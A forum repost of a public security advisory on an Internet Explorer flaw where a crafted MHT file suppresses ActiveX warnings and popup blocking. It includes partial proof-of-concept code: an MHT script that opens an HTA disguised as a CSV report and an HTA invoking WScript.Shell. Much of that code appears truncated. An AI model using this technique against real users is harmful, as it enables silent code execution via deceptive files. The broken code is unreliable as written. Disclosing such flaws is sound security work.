Jump to content
  • Hello visitors, welcome to the Hacker World Forum!

    Red Team 1949  (formerly CHT Attack and Defense Team) In this rapidly changing Internet era, we maintain our original intention and create the best community to jointly exchange network technologies. You can obtain hacker attack and defense skills and knowledge in the forum, or you can join our Telegram communication group to discuss and communicate in real time. All kinds of advertisements are prohibited in the forum. Please register as a registered user to check our usage and privacy policy. Thank you for your cooperation.

    TheHackerWorld Official

Microsoft Internet Explorer / ActiveX Control - Security Bypass


Recommended Posts

# Exploit Title: Microsoft Internet Explorer / ActiveX Control - Security Bypass
# Exploit Author: John Page (aka hyp3rlinx)
# Website: hyp3rlinx.altervista.org
# Source:  http://hyp3rlinx.altervista.org/advisories/MICROSOFT-INTERNET-EXPLORER-ACTIVEX-CONTROL-SECURITY-BYPASS.txt
# twitter.com/hyp3rlinx
# ISR: ApparitionSec


Microsoft Internet Explorer (MSIE)
Internet Explorer is a discontinued series of graphical web browsers
developed by Microsoft and included in the Microsoft Windows line of
operating systems, starting in 1995.

[Vulnerability Type]
ActiveX Control Security Bypass

[CVE Reference]

[Security Issue]
Upon opening a specially crafted .MHT file on disk, Internet Explorer
ActiveX control warnings as well as popup blocker privacy settings are
not enforced.
This can allow the execution of ActiveX content with zero warning to
an unsuspecting end user and or force them to visit arbitrary attacker
controlled websites.

By default when opening browser associated files that contain active
content, MSIE restricts scripts from running without explicit user
interaction and permission.
Instead end users are presented with a yellow warning bar on the
browsers webpage, asking first if they wish to allow the running of
blocked content.
This prevents execution of active content scripts or controls without
the user first clicking the "Allow blocked content" warning bar.

However, specially crafted MHT files residing on disk that contain an
invalid header directive suppress ActiveX warnings and Popup blocker
privacy settings.
Therefore, to bypass Internet Explorer "active content" blocking,
files needs to contain an Content-Location header using an arbitrary
named value E.g.

"Content-Location: PBARBAR"

Note, often times MHT files are set to open in IE by default and IE
while discontinued it is still present on the Windows OS.
Tested successfully on Windows 10 latest fully patched version with
default IE security settings.

Expected result: ActiveX control security warning, prevention of code
execution and blocking browser popup windows.
Actual result: No ActiveX control code execution blocking, security
warnings or browser window popup blocking enforcement.

[PoC Requirements]
MHT file must reside on disk, think targeted attack scenarios.

Change [VICTIM] value below to a specified user for testing.

1) Create the MHT PoC file.


MIME-Version: 1.0
Content-Type: multipart/related; type="text/html";
This is a multi-part message in MIME format.

Content-Type: text/html; charset="UTF-8"
Content-Location: DOOM

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN"
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />

var args = ['height='+1,'width='+1,].join(',')
setTimeout("", 3000)
var pop = win.open('c:/Users/[VICTIM]/Desktop/Sales_Report_2021.csv
________________________________________________________.hta', 'pop',



2) Create the PoC HTA file.


SYSMENU="no"  CAPTION="no" />
<script language="VBScript">
Set WshShell = CreateObject("WScript.Shell")

3) Open the MHT file locally.

[Network Access]

[POC/Video URL]

[Disclosure Timeline]
Vendor Notification:  May 13, 2019
MSRC : July 2, 2019
"We determined that a fix for this issue will be considered in a
future version of this product or service.
At this time, we will not be providing ongoing updates of the status
of the fix for this issue, and we have closed this case."
December 5, 2021 : Public Disclosure

[+] Disclaimer
The information contained within this advisory is supplied "as-is"
with no warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory,
provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion
in vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse
of the information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The
author prohibits any malicious use of security related information
or exploits by the author or elsewhere. All content (c).

Link to post
Link to comment
Share on other sites


discussion group

discussion group

    You don't have permission to chat.
    • Recently Browsing   0 members

      • No registered users viewing this page.
    • Create New...